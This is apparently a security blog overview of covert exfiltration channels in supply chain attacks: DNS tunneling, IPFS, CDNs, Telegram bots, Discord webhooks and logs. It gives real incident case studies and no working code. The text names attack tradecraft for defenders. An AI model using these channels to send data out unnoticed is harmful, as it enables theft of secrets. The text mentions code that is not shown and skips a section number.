Exfiltration Techniques in Supply Chain Attacks: An Overview

Modern threat actors are leveraging sophisticated covert techniques to exfiltrate sensitive data from development environments in supply chain attacks. By exploiting trusted platforms like Discord, Telegram, and CDNs as command-and-control (C2) channels, attackers can operate under the radar. Techniques like DNS tunneling and CDN abuse enable attackers to communicate unnoticed, making it essential for security teams to adopt targeted defense measures. This guide explores stealthy exfiltration methods, real-world case studies, and actionable technical controls to counter these advanced threats.

1. DNS Tunneling

DNS tunneling involves encoding data within DNS queries and responses (instead of vanilla HTTP) as a network channel. This allows attackers to stealthily communicate with command-and-control (C2) servers. Given that DNS is a fundamental protocol often overlooked by traditional security measures, it provides an attractive vector for covert data exfiltration.

Real-World Examples:

Alex Birsan's Dependency confusion (2021): Alex Birsan’s famous dependency confusion attack poc targeted major companies like Apple and Microsoft. By exploiting public and private npm package confusion, Birsan exfiltrated sensitive data through DNS queries to attacker-controlled domains, bypassing traditional firewall blacklists. This attack demonstrated how easily DNS tunneling could be used to steal corporate secrets without raising alarms.

Source: Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies (Alex Birsan)

2. IPFS (Inter-Planetary File System)

IPFS is a decentralized protocol designed for content storage and sharing across multiple nodes. Its resilience and decentralized nature, while advantageous for legitimate uses, are also exploited by attackers to distribute and conceal stolen data, making it challenging for victims to track and remove such data.

Attackers use IPFS to generate unique content identifiers (CIDs) that point to the distributed data. This data, split across multiple IPFS nodes, is accessible through any IPFS gateway using these CIDs, complicating takedown efforts and allowing widespread dissemination with minimal control by the original owners.

Real-World Examples:

Ledger ConnectKit wallet drain (2023): On December 14th, 2023, Ledger—one of the most popular hardware wallets for cryptocurrency—detected an exploit involving the Ledger Connect Kit npm package. The attackers hijacked the upstream dependency through a credential leak in GitHub Actions from a maintainer, which provided publishing rights. They subsequently injected malicious code into decentralized applications (DApps) that were using the Ledger Connect Kit, tricking EVM (Ethereum Virtual Machine) DApp users into signing fraudulent transactions that drained their wallets.

Ledger Supply Chain Attack: A Case Study in Dynamic Visibility (listen.dev blog)

3. CDN Exploitation

Content Delivery Networks (CDNs) are critical to modern web infrastructure, enabling faster and more reliable content distribution. However, their trusted status presents a significant security risk, particularly in the context of supply chain attacks. Attackers have increasingly exploited this trust by injecting malicious scripts into libraries delivered through CDNs, compromising millions of websites without raising suspicion.

Source: Polyfill.io Supply Chain Attack (Qualys)

Real-World Example:

Polyfill hack (2024): To illustrate CDN exploitation in supply chain attacks, the recent Polyfill.io incident serves as a prime example. In July 2024, attackers compromised the Polyfill CDN, which is widely used by websites to ensure compatibility of newer web features across older browsers. The attackers injected malicious code into the CDN-delivered JavaScript files, impacting thousands of websites that relied on these scripts for polyfill functionality.
Cloudflare CDNJS exploit (2021): What's alarming is that even organizations serving global internet infrastructure have been impacted by these attacks. A vulnerability found in Cloudflare’s cdnjs service in 2021 further highlighted these risks, where the security researcher RyotaK was able to execute arbitrary commands on Cloudflare's core cdn.js library, potentially compromising over 12% of the web,
Ledger ConnectKit wallet drain (2023): another instance of CDN exploitation was in the Ledger attack detailed above, where attackers leveraged Fastly's CDN, to dynamically load malicious scripts during the package installation process. By using a trusted CDN, the attackers infiltrated environments undetected.
Source: listen.dev research

5. Telegram

Overview: Telegram’s API is robust and widely used for various legitimate purposes. However, it also provides attackers with a convenient and encrypted channel for exfiltrating stolen data. By using Telegram bots, attackers can seamlessly integrate exfiltration capabilities into their malware.

Real-World Examples

Masad Stealer attack (2020): The Masad Stealer malware is a prime example of attackers exploiting Telegram for exfiltration. After infecting a system, Masad Stealer collects sensitive data, such as browser credentials, cryptocurrency wallets, and Discord tokens, and sends this information to a Telegram bot. Using Telegram’s encrypted API, the malware bypasses traditional security measures, making it difficult to detect the data exfiltration.

This code demonstrates how the malware collects data and sends it as a message to the attacker's Telegram bot, effectively bypassing traditional security tools by exploiting Telegram's API. This Paul Kimayong Jupiter blog explains this attack in detail.

6. Discord

Discord is extensively used by developers and gaming communities, providing rich integration through APIs and webhooks. Unfortunately, attackers exploit these features for exfiltration attacks, as evidenced by recent supply chain malware targeting npm packages that employ techniques to siphon data via Discord webhooks, hiding in plain sight amidst regular Discord traffic and provide a channel for C2 and exfiltration attacks. This goes back to 2020, where there were reports from researchers tracing this method of attack to APT groups.

Source: Malicious NPM Packages Exploiting Discord for Supply Chain Attacks (listen.dev research)

Real-World Examples

Malicious npm packages using Discord C2 (2024): On August 23, 2024, researchers discovered several malicious npm packages using Discord webhooks to exfiltrate sensitive data. These packages, live on npm for months, siphoned data such as environment variables and API keys by leveraging Discord as a command-and-control (C2) channel. The attackers embedded malicious scripts into these npm packages, which executed during the installation process, disguising the exfiltration by blending into regular Discord traffic.
These packages were distributed widely and remained undetected for up to three months, infiltrating numerous projects. Once installed, the malware disguised itself by executing during the package installation process through a malicious installation script.
Malware families using Discord for exfiltration (2021): known malware families like Smokeloader and PrivateLoader also exploited Discord’s infrastructure to deliver payloads and exfiltrate data. These loaders, often used by known APT groups, utilized Discord’s CDN and webhooks to communicate with infected systems, leveraging the platform’s trustworthiness to evade detection. This technique was discussed by threat researcher Crawl3r ranging back to 2020.

7. Logs

Overview: Logging services like Sentry are integral to debugging and monitoring applications. So are CI build logs from platforms like GitHub Actions, that developers and orgs use everyday. However, when misconfigured, these services can inadvertently log and expose sensitive information, creating an unintentional exfiltration vector for attackers.